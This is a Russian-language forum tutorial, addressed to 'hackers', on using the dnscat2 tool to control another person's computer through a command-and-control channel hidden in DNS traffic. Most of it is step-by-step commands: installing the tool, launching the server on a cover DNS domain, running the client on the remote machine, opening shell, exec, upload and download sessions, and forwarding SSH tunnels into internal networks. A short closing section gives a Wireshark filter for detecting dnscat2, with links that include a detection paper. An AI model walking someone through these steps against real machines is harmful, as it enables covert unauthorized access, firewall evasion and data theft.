DNSCAT. Доступ к чужому ПК через DNS

Приветствую, хакеры!
Сегодня я бы хотел вам рассказать об утилите dnscat2

dnscat2 - это утилита для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С.

C&C (Command and Control) сервер - компьютер, контролируемый атакующим, который отправляет команды на скомпрометированную машину.

В чем смысл маскировки трафика под DNS​

Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен.

Накидал для вас примерную схему:

Скачивание и установка

sudo apt-get updаte

sudo аpt-get -y instаll ruby-dev git mаke g++

sudo gem install bundler

git clone https://github.com/iagox86/dnscat2.git

Установка серверной части:

cd dnscat2/server

bundle instаll

Установка клиентской части:

cd dnscat2/client

make

Если возникли ошибки при установке:
iagox86/dnscat2 найдите вашу ошибку здесь.
Тут описаны некоторые ошибки. Если вашей ошибки нет, тозагуглите.

К делу​

Запускаем:

Сервер: sudo ruby dnscat2.rb

Клиент: запускаете на удаленной машине.

*Если разрешен доступ только к легитимным DNS серверам:

Сервер:

sudo ruby dnscat2.rb legitdnsserver.com

Клиент:

./build legitdnsserver.com

• Как только произойдет подключение dnscat2 выведет вам номер сессии.
• После выбора сессии:

sessions -i

• У вас будет доступен ряд команд:

clear

delay

download

echo

exec

help

listen

ping

quit

set

shell

shutdown

suspend

tunnels

unset

upload

window

windows

Проброс туннеля

Если вам нужен удобный доступ к машинам в локальной сети по SSH, то это очень полезная вещь.

• Выбираем сессию и вводим команду:

listen :

• Теперь вы можете спокойно подключиться к той машине, которую не видно из вне через ssh.

ssh -P [email protected]

Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть.

Как обнаружить dnscat2 на своей машине​

• Делаем дамп через wireshark и забиваем следующий фильтр:

dns.qry.name.len > 16 and !mdns

16 - просто длина имени DNS домена. Я подбирал вручную, у вас это число может отличаться. Чтобы его подобрать просто смотрите в результат фильтрации. После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat.

• И в информации о пакете ищем dnscat.

Полезные ссылки

• https://github.com/iagox86/dnscat2 - Страница dnscat, с его документацией.
• https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 - Про обнаружение DNS туннелей.